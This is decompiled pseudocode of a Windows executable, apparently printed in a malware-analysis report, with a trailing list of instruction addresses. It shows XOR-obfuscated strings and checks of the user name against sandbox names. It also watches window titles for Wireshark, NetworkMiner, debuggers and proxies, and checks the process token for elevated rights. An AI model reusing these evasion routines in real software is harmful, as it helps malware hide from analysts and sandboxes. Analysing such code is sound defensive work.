						 *0x450f14 =  *_t11;
						 *0x450f18 = _v292;
						E0040F25B(_t458, _t594, E0042CF30);
						E0040EEFE(0x450ef4);
						_t574 = _t574 + 8;
					}
				}
				_t239 =  *0x450f19; // 0x0
				if(_t239 != 0) {
					 *0x450f14 =  *0x450f14 ^ 0x0000002e;
					 *0x450f15 =  *0x450f15 ^ 0x0000002e;
					 *0x450f16 =  *0x450f16 ^ 0x0000002e;
					 *0x450f17 =  *0x450f17 ^ 0x0000002e;
					 *0x450f18 =  *0x450f18 ^ 0x0000002e;
					 *0x450f19 = _t239 ^ 0x0000002e;
				}
				_t459 = 0x450f14;
				_v348 = 0;
				_v332 = 0;
				_v328 = 0xf;
				_v348 = 0;
				_t17 =  &(_t459[1]); // 0x450f15
				_t525 = _t17;
				goto L6;
				do {
					L8:
					_t245 =  *_t462;
					_t462 = _t462 + 1;
				} while (_t245 != 0);
				E004026B0(_t447,  &_v372,  &_v288, _t462 - _t526);
				_t465 =  &_v372;
				_t248 = E0040CA60( &_v372,  &_v348);
				_t528 = _v352;
				_t448 = _t248;
				if(_t528 < 0x10) {
					L13:
					_v8 = 0;
					_t529 = _v328;
					if(_t529 < 0x10) {
						L17:
						if(_t448 != 0) {
							L76:
							 *[fs:0x0] = _v16;
							_pop(_t549);
							_pop(_t561);
							_pop(_t449);
							return E0040EBBF(0, _t449, _v24 ^ _t569, _t529, _t549, _t561);
						} else {
							_t251 =  *0x451000;
							_v296 = 0x464f467d;
							if( *0x451000 >  *((intOrPtr*)(_t560 + 4))) {
								E0040EF48(_t251, 0x451000);
								_t574 = _t574 + 4;
								_t608 =  *0x451000 - 0xffffffff;
								if( *0x451000 == 0xffffffff) {
									_t41 =  &_v296; // 0x464f467d
									 *0x451010 =  *_t41;
									 *0x451014 = 0x2e;
									E0040F25B(_t465, _t608, E0042CF10);
									E0040EEFE(0x451000);
									_t574 = _t574 + 8;
								}
							}
							_t252 =  *0x451014;
							if(_t252 != 0) {
								 *0x451010 =  *0x451010 ^ 0x0000002e;
								 *0x451011 =  *0x451011 ^ 0x0000002e;
								 *0x451012 =  *0x451012 ^ 0x0000002e;
								 *0x451013 =  *0x451013 ^ 0x0000002e;
								 *0x451014 = _t252 ^ 0x0000002e;
							}
							_t470 = 0x451010;
							_v348 = 0;
							_v332 = 0;
							_v328 = 0xf;
							_v348 = 0;
							_t46 =  &(_t470[0]); // 0x451011
							_t530 = _t46;
							do {
								_t253 =  *_t470;
								_t470 =  &(_t470[0]);
							} while (_t253 != 0);
							E004026B0(0x2e,  &_v348, 0x451010, _t470 - _t530);
							_t48 =  &_v296; // 0x464f467d
							_v8 = 2;
							_v296 = 0x101;
							GetUserNameA( &_v288, _t48);
							_t473 =  &_v288;
							_v372 = 0;
							_v356 = 0;
							_t531 = _t473 + 1;
							_v352 = 0xf;
							do {
								_t258 =  *_t473;
								_t473 = _t473 + 1;
							} while (_t258 != 0);
							E004026B0(0x2e,  &_v372,  &_v288, _t473 - _t531);
							_t476 =  &_v372;
							_t261 = E0040CA60( &_v372,  &_v348);
							_t533 = _v352;
							_t451 = _t261;
							if(_t533 < 0x10) {
								L31:
								_v8 = 0;
								_t529 = _v328;
								if(_t529 < 0x10) {
									L35:
									if(_t451 != 0) {
										goto L76;
									} else {
										_t262 =  *0x450eec; // 0x0
										_v300 = 0x5a5d4b5a;
										_v296 = 0x4d404b6c;
										_v292 = 0x2e46;
										if(_t262 >  *((intOrPtr*)(_t560 + 4))) {
											E0040EF48(_t262, 0x450eec);
											_t574 = _t574 + 4;
											_t622 =  *0x450eec - 0xffffffff;
											if( *0x450eec == 0xffffffff) {
												asm("movq xmm0, [ebp-0x128]");
												asm("movq [0x450d30], xmm0");
												 *0x450d38 = _v292;
												E0040F25B(_t476, _t622, E0042CEF0);
												E0040EEFE(0x450eec);
												_t574 = _t574 + 8;
											}
										}
										_t263 =  *0x450d39; // 0x0
										if(_t263 != 0) {
											 *0x450d30 =  *0x450d30 ^ 0x0000002e;
											 *0x450d31 =  *0x450d31 ^ 0x0000002e;
											 *0x450d32 =  *0x450d32 ^ 0x0000002e;
											 *0x450d33 =  *0x450d33 ^ 0x0000002e;
											 *0x450d34 =  *0x450d34 ^ 0x0000002e;
											 *0x450d35 =  *0x450d35 ^ 0x0000002e;
											 *0x450d36 =  *0x450d36 ^ 0x0000002e;
											 *0x450d37 =  *0x450d37 ^ 0x0000002e;
											 *0x450d38 =  *0x450d38 ^ 0x0000002e;
											 *0x450d39 = _t263 ^ 0x0000002e;
										}
										_t477 = 0x450d30;
										_v348 = 0;
										_v332 = 0;
										_v328 = 0xf;
										_v348 = 0;
										_t77 =  &(_t477[1]); // 0x450d31
										_t534 = _t77;
										do {
											_t264 =  *_t477;
											_t477 =  &(_t477[1]);
										} while (_t264 != 0);
										E004026B0(_t451,  &_v348, 0x450d30, _t477 - _t534);
										_t79 =  &_v296; // 0x4d404b6c
										_v8 = 3;
										_v296 = 0x101;
										GetUserNameA( &_v288, _t79);
										_t480 =  &_v288;
										_v372 = 0;
										_v356 = 0;
										_t535 = _t480 + 1;
										_v352 = 0xf;
										do {
											_t269 =  *_t480;
											_t480 = _t480 + 1;
										} while (_t269 != 0);
										E004026B0(_t451,  &_v372,  &_v288, _t480 - _t535);
										_t272 = E0040CA60( &_v372,  &_v348);
										_t537 = _v352;
										_t451 = _t272;
										if(_t537 < 0x10) {
											L49:
											_v8 = 0;
											_t529 = _v328;
											if(_t529 < 0x10) {
												L53:
												if(_t451 != 0) {
													goto L76;
												} else {
													_t273 = GetForegroundWindow(); // executed
													GetWindowTextA(_t273,  &_v288, 0xc8);
													_t485 =  &_v288;
													_t538 = _t485 + 1;
													do {
														_t275 =  *_t485;
														_t485 = _t485 + 1;
													} while (_t275 != 0);
													E004026B0(_t451,  &_v324,  &_v288, _t485 - _t538);
													_t279 = E004101E0( &_v288, " Far ");
													_t574 = _t574 + 8;
													if(_t279 == 0) {
														_t451 = Sleep;
														while(1) {
															_t386 = E004101E0( &_v288, "roxifier");
															_t574 = _t574 + 8;
															if(_t386 != 0) {
																goto L72;
															}
															_t388 = E004101E0( &_v288, "HTTP Analyzer");
															_t574 = _t574 + 8;
															if(_t388 == 0) {
																_t390 = E004101E0( &_v288, "Wireshark");
																_t574 = _t574 + 8;
																if(_t390 == 0) {
																	_t392 = E004101E0( &_v288, "NetworkMiner");
																	_t574 = _t574 + 8;
																	if(_t392 == 0) {
																		_t568 =  &_v288;
																		_t518 = _t568 + 1;
																		do {
																			_t393 =  *_t568;
																			_t568 = _t568 + 1;
																		} while (_t393 != 0);
																		_t560 = _t568 - _t518;
																		_t548 = 0;
																		if(_t560 > 0) {
																			do {
																				 *((char*)(_t569 + _t548 - 0x11c)) = E00418275( *((char*)(_t569 + _t548 - 0x11c)));
																				_t574 = _t574 + 4;
																				_t548 = _t548 + 1;
																			} while (_t548 < _t560);
																		}
																		_t395 = E004101E0( &_v288, "dbg");
																		_t574 = _t574 + 8;
																		if(_t395 == 0) {
																			_t397 = E004101E0( &_v288, "debug");
																			_t574 = _t574 + 8;
																			if(_t397 == 0) {
																				Sleep(0x258); // executed
																				_t398 = GetForegroundWindow(); // executed
																				GetWindowTextA(_t398,  &_v288, 0xc8);
																				_t520 =  &_v288;
																				_t543 = _t520 + 1;
																				do {
																					_t400 =  *_t520;
																					_t520 = _t520 + 1;
																				} while (_t400 != 0);
																				E004026B0(_t451,  &_v324,  &_v288, _t520 - _t543);
																				_t404 = E004101E0( &_v288, " Far ");
																				_t574 = _t574 + 8;
																				if(_t404 == 0) {
																					continue;
																				}
																			}
																		}
																	}
																}
															}
															goto L72;
														}
													}
													L72:
													_t529 = _v304;
													if(_t529 < 0x10) {
														goto L76;
													} else {
														_t488 = _v324;
														_t529 = _t529 + 1;
														_t280 = _t488;
														if(_t529 < 0x1000) {
															L75:
															_push(_t529);
															E0040EDFF(_t488);
															goto L76;
														} else {
															_t488 =  *((intOrPtr*)(_t488 - 4));
															_t529 = _t529 + 0x23;
															if(_t280 - _t488 + 0xfffffffc > 0x1f) {
																goto L77;
															} else {
																goto L75;
															}
														}
													}
												}
											} else {
												_t523 = _v348;
												_t529 = _t529 + 1;
												_t407 = _t523;
												if(_t529 < 0x1000) {
													L52:
													_push(_t529);
													E0040EDFF(_t523);
													_t574 = _t574 + 8;
													goto L53;
												} else {
													_t488 =  *((intOrPtr*)(_t523 - 4));
													_t529 = _t529 + 0x23;
													if(_t407 - _t488 + 0xfffffffc > 0x1f) {
														goto L77;
													} else {
														goto L52;
													}
												}
											}
										} else {
											_t524 = _v372;
											_t544 = _t537 + 1;
											_t411 = _t524;
											if(_t544 < 0x1000) {
												L48:
												_push(_t544);
												E0040EDFF(_t524);
												_t574 = _t574 + 8;
												goto L49;
											} else {
												_t488 =  *((intOrPtr*)(_t524 - 4));
												_t529 = _t544 + 0x23;
												if(_t411 - _t488 + 0xfffffffc > 0x1f) {
													goto L77;
												} else {
													goto L48;
												}
											}
										}
									}
								} else {
									_t476 = _v348;
									_t529 = _t529 + 1;
									_t420 = _t476;
									if(_t529 < 0x1000) {
										L34:
										_push(_t529);
										E0040EDFF(_t476);
										_t574 = _t574 + 8;
										goto L35;
									} else {
										_t488 =  *((intOrPtr*)(_t476 - 4));
										_t529 = _t529 + 0x23;
										if(_t420 - _t488 + 0xfffffffc > 0x1f) {
											goto L77;
										} else {
											goto L34;
										}
									}
								}
							} else {
								_t476 = _v372;
								_t545 = _t533 + 1;
								_t424 = _t476;
								if(_t545 < 0x1000) {
									L30:
									_push(_t545);
									E0040EDFF(_t476);
									_t574 = _t574 + 8;
									goto L31;
								} else {
									_t488 =  *((intOrPtr*)(_t476 - 4));
									_t529 = _t545 + 0x23;
									if(_t424 - _t488 + 0xfffffffc > 0x1f) {
										goto L77;
									} else {
										goto L30;
									}
								}
							}
						}
					} else {
						_t465 = _v348;
						_t529 = _t529 + 1;
						_t433 = _t465;
						if(_t529 < 0x1000) {
							L16:
							_push(_t529);
							E0040EDFF(_t465);
							_t574 = _t574 + 8;
							goto L17;
						} else {
							_t488 =  *((intOrPtr*)(_t465 - 4));
							_t529 = _t529 + 0x23;
							if(_t433 - _t488 + 0xfffffffc > 0x1f) {
								goto L77;
							} else {
								goto L16;
							}
						}
					}
				} else {
					_t465 = _v372;
					_t546 = _t528 + 1;
					_t437 = _t465;
					if(_t546 < 0x1000) {
						L12:
						_push(_t546);
						E0040EDFF(_t465);
						_t574 = _t574 + 8;
						goto L13;
					} else {
						_t488 =  *((intOrPtr*)(_t465 - 4));
						_t529 = _t546 + 0x23;
						if(_t437 - _t488 + 0xfffffffc > 0x1f) {
							L77:
							E00413527(_t451, _t529, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t569);
							_t570 = _t574;
							_push(_t488);
							__eflags =  *((intOrPtr*)(_t529 + 0x14)) - 0x10;
							_t285 = _t529;
							_push(_t451);
							_push(_t560);
							_push(_t548);
							_t562 = _t488;
							if( *((intOrPtr*)(_t529 + 0x14)) >= 0x10) {
								_t285 =  *_t529;
							}
							__eflags =  *((intOrPtr*)(_t562 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t562 + 0x14)) >= 0x10) {
								_t488 =  *_t562;
							}
							_t452 =  *((intOrPtr*)(_t529 + 0x10));
							_t539 = _t562 + 0x10;
							_t550 =  *_t539;
							_v12 = _t539;
							_t286 = E00402890(_t488, _t550, _t488, _t285, _t452);
							_t541 = _t286;
							_t576 = _t574 + 0xc;
							__eflags = _t541 - 0xffffffff;
							if(_t541 == 0xffffffff) {
								L87:
								return _t286;
							} else {
								__eflags = _t550 - _t541;
								if(_t550 < _t541) {
									E004027F0(_t488, _t541);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t570);
									_t571 = _t576;
									_push(0xffffffff);
									_push(E0042C707);
									_push( *[fs:0x0]);
									_t577 = _t576 - 0x154;
									_t289 =  *0x43d054; // 0x7bd02ead
									_t290 = _t289 ^ _t571;
									_v432 = _t290;
									_push(_t452);
									_push(_t562);
									_push(_t550);
									_push(_t290);
									 *[fs:0x0] =  &_v428;
									_v696 = 0;
									_v700 = 0x455d4f5a;
									_v696 = 0x2e5c4943;
									_t564 =  *((intOrPtr*)( *[fs:0x2c]));
									_t293 =  *0x450ee8; // 0x80000010
									__eflags = _t293 -  *((intOrPtr*)(_t564 + 4));
									if(_t293 >  *((intOrPtr*)(_t564 + 4))) {
										E0040EF48(_t293, 0x450ee8);
										_t577 = _t577 + 4;
										__eflags =  *0x450ee8 - 0xffffffff;
										if(__eflags == 0) {
											_t143 =  &_v296; // 0x455d4f5a
											_t144 =  &_v292; // 0x2e5c4943
											 *0x450d40 =  *_t143;
											 *0x450d44 =  *_t144;
											E0040F25B( *_t144, __eflags, E0042CFC0);
											E0040EEFE(0x450ee8);
											_t577 = _t577 + 8;
										}
									}
									_t294 =  *0x450d47; // 0x0
									__eflags = _t294;
									if(_t294 != 0) {
										 *0x450d40 =  *0x450d40 ^ 0x0000002e;
										 *0x450d41 =  *0x450d41 ^ 0x0000002e;
										 *0x450d42 =  *0x450d42 ^ 0x0000002e;
										 *0x450d43 =  *0x450d43 ^ 0x0000002e;
										 *0x450d44 =  *0x450d44 ^ 0x0000002e;
										 *0x450d45 =  *0x450d45 ^ 0x0000002e;
										 *0x450d46 =  *0x450d46 ^ 0x0000002e;
										_t376 = _t294 ^ 0x0000002e;
										__eflags = _t376;
										 *0x450d47 = _t376;
									}
									_t578 = _t577 - 0x18;
									_t489 = 0x450d40;
									_t542 = _t578;
									_t145 =  &(_t489[1]); // 0x450d41
									_t552 = _t145;
									 *_t542 = 0;
									_t542[4] = 0;
									_t542[5] = 0xf;
									asm("o16 nop [eax+eax]");
									do {
										_t295 =  *_t489;
										_t489 =  &(_t489[1]);
										__eflags = _t295;
									} while (_t295 != 0);
									E004026B0(_t452, _t542, 0x450d40, _t489 - _t552); // executed
									_t297 = E00405350(_t452); // executed
									_t579 =  &(_t578[6]);
									__eflags = _t297;
									if(_t297 != 0) {
										L145:
										_t298 = 1;
										goto L146;
									} else {
										_t300 =  *0x450fbc; // 0x80000011
										_v296 = 0x455d4f7a;
										_v292 = 0x2e5c4943;
										__eflags = _t300 -  *((intOrPtr*)(_t564 + 4));
										if(_t300 >  *((intOrPtr*)(_t564 + 4))) {
											E0040EF48(_t300, 0x450fbc);
											_t579 =  &(_t579[1]);
											__eflags =  *0x450fbc - 0xffffffff;
											if(__eflags == 0) {
												_t151 =  &_v296; // 0x455d4f7a
												_t152 =  &_v292; // 0x2e5c4943
												 *0x450f90 =  *_t151;
												 *0x450f94 =  *_t152;
												E0040F25B( *_t152, __eflags, E0042CFB0);
												E0040EEFE(0x450fbc);
												_t579 =  &(_t579[2]);
											}
										}
										_t301 =  *0x450f97; // 0x0
										__eflags = _t301;
										if(_t301 != 0) {
											 *0x450f90 =  *0x450f90 ^ 0x0000002e;
											 *0x450f91 =  *0x450f91 ^ 0x0000002e;
											 *0x450f92 =  *0x450f92 ^ 0x0000002e;
											 *0x450f93 =  *0x450f93 ^ 0x0000002e;
											 *0x450f94 =  *0x450f94 ^ 0x0000002e;
											 *0x450f95 =  *0x450f95 ^ 0x0000002e;
											 *0x450f96 =  *0x450f96 ^ 0x0000002e;
											_t371 = _t301 ^ 0x0000002e;
											__eflags = _t371;
											 *0x450f97 = _t371;
										}
										_t580 = _t579 - 0x18;
										_t496 = 0x450f90;
										_t542 = _t580;
										_t153 =  &(_t496[1]); // 0x450f91
										_t554 = _t153;
										 *_t542 = 0;
										_t542[4] = 0;
										_t542[5] = 0xf;
										do {
											_t302 =  *_t496;
											_t496 =  &(_t496[1]);
											__eflags = _t302;
										} while (_t302 != 0);
										_t498 = _t542;
										E004026B0(_t452, _t542, 0x450f90, _t496 - _t554); // executed
										_t304 = E00405350(_t452); // executed
										_t581 =  &(_t580[6]);
										__eflags = _t304;
										if(_t304 != 0) {
											goto L145;
										} else {
											_t305 =  *0x450f9c; // 0x80000012
											_v296 = 0x4b5c4759;
											_v292 = 0x5c4f465d;
											_v288 = 0x2e45;
											__eflags = _t305 -  *((intOrPtr*)(_t564 + 4));
											if(_t305 >  *((intOrPtr*)(_t564 + 4))) {
												E0040EF48(_t305, 0x450f9c);
												_t581 =  &(_t581[1]);
												__eflags =  *0x450f9c - 0xffffffff;
												if(__eflags == 0) {
													asm("movq xmm0, [ebp-0x11c]");
													asm("movq [0x450d8c], xmm0");
													 *0x450d94 = _v288;
													E0040F25B(_t498, __eflags, E0042CF90);
													E0040EEFE(0x450f9c);
													_t581 =  &(_t581[2]);
												}
											}
											_t306 =  *0x450d95; // 0x0
											__eflags = _t306;
											if(_t306 != 0) {
												 *0x450d8c =  *0x450d8c ^ 0x0000002e;
												 *0x450d8d =  *0x450d8d ^ 0x0000002e;
												 *0x450d8e =  *0x450d8e ^ 0x0000002e;
												 *0x450d8f =  *0x450d8f ^ 0x0000002e;
												 *0x450d90 =  *0x450d90 ^ 0x0000002e;
												 *0x450d91 =  *0x450d91 ^ 0x0000002e;
												 *0x450d92 =  *0x450d92 ^ 0x0000002e;
												 *0x450d93 =  *0x450d93 ^ 0x0000002e;
												 *0x450d94 =  *0x450d94 ^ 0x0000002e;
												_t366 = _t306 ^ 0x0000002e;
												__eflags = _t366;
												 *0x450d95 = _t366;
											}
											_t582 = _t581 - 0x18;
											_t499 = 0x450d8c;
											_t542 = _t582;
											_t161 =  &(_t499[1]); // 0x450d8d
											_t555 = _t161;
											 *_t542 = 0;
											_t542[4] = 0;
											_t542[5] = 0xf;
											do {
												_t307 =  *_t499;
												_t499 =  &(_t499[1]);
												__eflags = _t307;
											} while (_t307 != 0);
											E004026B0(_t452, _t542, 0x450d8c, _t499 - _t555); // executed
											_t309 = E00405350(_t452); // executed
											_t583 =  &(_t582[6]);
											__eflags = _t309;
											if(_t309 != 0) {
												goto L145;
											} else {
												_t310 = GetForegroundWindow(); // executed
												__eflags = _t310;
												if(_t310 == 0) {
													L144:
													_t298 = 0;
													goto L146;
												} else {
													GetWindowTextA(_t310,  &_v284, 0x100);
													_t312 =  *0x450fb8; // 0x80000013
													_v312 = 0x4d415c7e;
													_v308 = 0xe5d5d4b;
													_v304 = 0x454d4f66;
													_v300 = 0x5c4b;
													__eflags = _t312 -  *((intOrPtr*)(_t564 + 4));
													if(_t312 >  *((intOrPtr*)(_t564 + 4))) {
														E0040EF48(_t312, 0x450fb8);
														_t583 =  &(_t583[1]);
														__eflags =  *0x450fb8 - 0xffffffff;
														if(__eflags == 0) {
															_t170 =  &_v304; // 0x454d4f66
															asm("movq xmm0, [ebp-0x12c]");
															 *0x450f6c =  *_t170;
															_t171 =  &_v300; // 0x5c4b
															asm("movq [0x450f64], xmm0");
															 *0x450f70 =  *_t171;
															 *0x450f72 = 0x2e;
															E0040F25B( &_v284, __eflags, E0042CF60);
															E0040EEFE(0x450fb8);
															_t583 =  &(_t583[2]);
														}
													}
													__eflags =  *0x450f72;
													if( *0x450f72 != 0) {
														_t360 = 0;
														__eflags = 0;
														do {
															 *(_t360 + 0x450f64) =  *(_t360 + 0x450f64) ^ 0x0000002e;
															_t360 = _t360 + 1;
															__eflags = _t360 - 0xf;
														} while (_t360 < 0xf);
													}
													_t503 = 0x450f64;
													_v364 = 0;
													_v348 = 0;
													_v344 = 0xf;
													_v364 = 0;
													_t178 = _t503 + 1; // 0x450f65
													_t542 = _t178;
													do {
														_t313 =  *_t503;
														_t503 = _t503 + 1;
														__eflags = _t313;
													} while (_t313 != 0);
													E004026B0(0x2e,  &_v364, 0x450f64, _t503 - _t542);
													_v16 = 0;
													__eflags = _v344 - 0x10;
													_t456 = 1;
													_v292 = 1;
													_t316 =  >=  ? _v364 :  &_v364;
													_t318 = E004101E0( &_v284,  >=  ? _v364 :  &_v364);
													_t584 =  &(_t583[2]);
													__eflags = _t318;
													if(_t318 != 0) {
														L131:
														_v313 = 1;
													} else {
														_t347 =  *0x450f60; // 0x80000014
														_v308 = 0x4b5c4779;
														_v304 = 0x5c4f465d;
														_v300 = 0x2e45;
														__eflags = _t347 -  *((intOrPtr*)(_t564 + 4));
														if(_t347 >  *((intOrPtr*)(_t564 + 4))) {
															E0040EF48(_t347, 0x450f60);
															_t584 = _t584 + 4;
															__eflags =  *0x450f60 - 0xffffffff;
															if(__eflags == 0) {
																asm("movq xmm0, [ebp-0x128]");
																_t190 =  &_v300; // 0x2e45
																asm("movq [0x450fd4], xmm0");
																 *0x450fdc =  *_t190;
																E0040F25B( &_v364, __eflags, E0042CF40);
																E0040EEFE(0x450f60);
																_t584 = _t584 + 8;
															}
														}
														_t348 =  *0x450fdd; // 0x0
														__eflags = _t348;
														if(_t348 != 0) {
															 *0x450fd4 =  *0x450fd4 ^ 0x0000002e;
															 *0x450fd5 =  *0x450fd5 ^ 0x0000002e;
															 *0x450fd6 =  *0x450fd6 ^ 0x0000002e;
															 *0x450fd7 =  *0x450fd7 ^ 0x0000002e;
															 *0x450fd8 =  *0x450fd8 ^ 0x0000002e;
															 *0x450fd9 =  *0x450fd9 ^ 0x0000002e;
															 *0x450fda =  *0x450fda ^ 0x0000002e;
															 *0x450fdb =  *0x450fdb ^ 0x0000002e;
															 *0x450fdc =  *0x450fdc ^ 0x0000002e;
															_t355 = _t348 ^ 0x0000002e;
															__eflags = _t355;
															 *0x450fdd = _t355;
														}
														_t512 = 0x450fd4;
														_v340 = 0;
														_v324 = 0;
														_v320 = 0xf;
														_t194 =  &(_t512[1]); // 0x450fd5
														_t542 = _t194;
														do {
															_t349 =  *_t512;
															_t512 =  &(_t512[1]);
															__eflags = _t349;
														} while (_t349 != 0);
														E004026B0(_t456,  &_v340, 0x450fd4, _t512 - _t542);
														__eflags = _v320 - 0x10;
														_t456 = 3;
														_t352 =  >=  ? _v340 :  &_v340;
														_t354 = E004101E0( &_v284,  >=  ? _v340 :  &_v340);
														_t584 = _t584 + 8;
														_v313 = 0;
														__eflags = _t354;
														if(_t354 != 0) {
															goto L131;
														}
													}
													__eflags = _t456 & 0x00000002;
													if((_t456 & 0x00000002) == 0) {
														L138:
														__eflags = _t456 & 0x00000001;
														if((_t456 & 0x00000001) == 0) {
															L143:
															__eflags = _v313;
															if(_v313 != 0) {
																goto L145;
															} else {
																goto L144;
															}
															L146:
															 *[fs:0x0] = _v24;
															_pop(_t553);
															_pop(_t565);
															_pop(_t454);
															__eflags = _v28 ^ _t571;
															return E0040EBBF(_t298, _t454, _v28 ^ _t571, _t542, _t553, _t565);
														} else {
															_t542 = _v344;
															__eflags = _t542 - 0x10;
															if(_t542 < 0x10) {
																goto L143;
															} else {
																_t506 = _v364;
																_t542 =  &(_t542[0]);
																_t319 = _t506;
																__eflags = _t542 - 0x1000;
																if(_t542 < 0x1000) {
																	L142:
																	_push(_t542);
																	E0040EDFF(_t506);
																	goto L143;
																} else {
																	_t506 =  *(_t506 - 4);
																	_t542 =  &(_t542[8]);
																	__eflags = _t319 - _t506 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L147;
																	} else {
																		goto L142;
																	}
																}
															}
														}
													} else {
														_t542 = _v320;
														_t456 = _t456 & 0xfffffffd;
														__eflags = _t542 - 0x10;
														if(_t542 < 0x10) {
															L137:
															_v324 = 0;
															_v320 = 0xf;
															_v340 = 0;
															goto L138;
														} else {
															_t511 = _v340;
															_t542 =  &(_t542[0]);
															_t343 = _t511;
															__eflags = _t542 - 0x1000;
															if(_t542 < 0x1000) {
																L136:
																_push(_t542);
																E0040EDFF(_t511);
																_t584 = _t584 + 8;
																goto L137;
															} else {
																_t511 =  *(_t511 - 4);
																_t542 =  &(_t542[8]);
																__eflags = _t343 - _t511 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L147:
																	E00413527(_t456, _t542, __eflags);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t571);
																	_t572 = _t584;
																	_t324 =  *0x43d054; // 0x7bd02ead
																	_v792 = _t324 ^ _t572;
																	_v876 = 0;
																	_v872 = 0x500;
																	_t328 = OpenProcessToken(GetCurrentProcess(), 8,  &_v884);
																	__eflags = _t328;
																	if(_t328 == 0) {
																		L151:
																		__eflags = _v20 ^ _t572;
																		return E0040EBBF(0, _t456, _v20 ^ _t572, _t542, _t555, _t564);
																	} else {
																		_t333 = GetTokenInformation(_v112, 1,  &_v96, 0x4c,  &_v108); // executed
																		_push(_v112);
																		__eflags = _t333;
																		if(_t333 != 0) {
																			CloseHandle();
																			_t337 = AllocateAndInitializeSid( &_v104, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v116);
																			__eflags = _t337;
																			if(_t337 == 0) {
																				goto L151;
																			} else {
																				_t338 = EqualSid(_v96, _v116);
																				FreeSid(_v116);
																				__eflags = _v20 ^ _t572;
																				_t567 = _t564;
																				return E0040EBBF(_t338, _t456, _v20 ^ _t572, _t542, _t555, _t567);
																			}
																		} else {
																			CloseHandle();
																			goto L151;
																		}
																	}
																} else {
																	goto L136;
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t382 = _t550 - _t541;
									__eflags = _t382 - _t452;
									_t457 =  <  ? _t382 : _t452;
									__eflags =  *((intOrPtr*)(_t562 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t562 + 0x14)) >= 0x10) {
										_t562 =  *_t562;
									}
									_t556 = _t550 - _t457;
									 *_v12 = _t556;
									__eflags = _t556 - _t541 + 1;
									_t286 = E004104C0(_t562 + _t541, _t562 + _t541 + _t457, _t556 - _t541 + 1);
									goto L87;
								}
							}
						} else {
							goto L12;
						}
					}
				}
				L6:
				_t240 =  *_t459;
				_t459 =  &(_t459[1]);
				if(_t240 != 0) {
					goto L6;
				} else {
					E004026B0(_t447,  &_v348, 0x450f14, _t459 - _t525);
					_t19 =  &_v296; // 0x47434a4f
					_v8 = 1;
					_t548 = GetUserNameA;
					_v296 = 0x101;
					GetUserNameA( &_v288, _t19); // executed
					_t462 =  &_v288;
					_v372 = 0;
					_v356 = 0;
					_t526 = _t462 + 1;
					_v352 = 0xf;
				}
				goto L8;
			}

0x004056a0
0x004056a0
0x004056a3
0x004056a5
0x004056b0
0x004056b1
0x004056b7
0x004056bc
0x004056be
0x004056c1
0x004056c3
0x004056c4
0x004056c8
0x004056ce
0x004056d8
0x004056e2
0x004056ec
0x004056f3
0x00405700
0x0040570a
0x00405713
0x00405715
0x00405720
0x00405727
0x0040572c
0x0040572f
0x00405736
0x00405738
0x0040573e
0x0040574f
0x00405755
0x0040575f
0x00405764
0x00405764
0x00405736
0x00405767
0x0040576e
0x00405770
0x00405777
0x0040577e
0x00405785
0x0040578c
0x00405795
0x00405795
0x0040579a
0x0040579f
0x004057a9
0x004057b3
0x004057bd
0x004057c4
0x004057c4
0x004057c4
0x00405830
0x00405830
0x00405830
0x00405832
0x00405833
0x00405847
0x00405852
0x00405858
0x0040585d
0x00405863
0x00405868
0x00405899
0x00405899
0x0040589d
0x004058a6
0x004058d7
0x004058d9
0x00405e74
0x00405e79
0x00405e81
0x00405e82
0x00405e83
0x00405e91
0x004058df
0x004058df
0x004058e6
0x004058f6
0x004058fd
0x00405902
0x00405905
0x0040590c
0x0040590e
0x00405919
0x0040591e
0x00405924
0x0040592e
0x00405933
0x00405933
0x0040590c
0x00405936
0x0040593d
0x0040593f
0x00405945
0x0040594b
0x00405951
0x00405959
0x00405959
0x0040595e
0x00405963
0x0040596d
0x00405977
0x00405981
0x00405988
0x00405988
0x00405990
0x00405990
0x00405992
0x00405993
0x004059a5
0x004059aa
0x004059b0
0x004059bb
0x004059c6
0x004059c8
0x004059ce
0x004059d8
0x004059e2
0x004059e5
0x004059f0
0x004059f0
0x004059f2
0x004059f3
0x00405a07
0x00405a12
0x00405a18
0x00405a1d
0x00405a23
0x00405a28
0x00405a59
0x00405a59
0x00405a5d
0x00405a66
0x00405a97
0x00405a99
0x00000000
0x00405a9f
0x00405a9f
0x00405aa4
0x00405aae
0x00405ab8
0x00405ac7
0x00405ace
0x00405ad3
0x00405ad6
0x00405add
0x00405adf
0x00405af3
0x00405afb
0x00405b01
0x00405b0b
0x00405b10
0x00405b10
0x00405add
0x00405b13
0x00405b1a
0x00405b1c
0x00405b23
0x00405b2a
0x00405b31
0x00405b38
0x00405b3f
0x00405b46
0x00405b4d
0x00405b54
0x00405b5d
0x00405b5d
0x00405b62
0x00405b67
0x00405b71
0x00405b7b
0x00405b85
0x00405b8c
0x00405b8c
0x00405b90
0x00405b90
0x00405b92
0x00405b93
0x00405ba5
0x00405baa
0x00405bb0
0x00405bbb
0x00405bc6
0x00405bc8
0x00405bce
0x00405bd8
0x00405be2
0x00405be5
0x00405bf0
0x00405bf0
0x00405bf2
0x00405bf3
0x00405c07
0x00405c18
0x00405c1d
0x00405c23
0x00405c28
0x00405c59
0x00405c59
0x00405c5d
0x00405c66
0x00405c97
0x00405c99
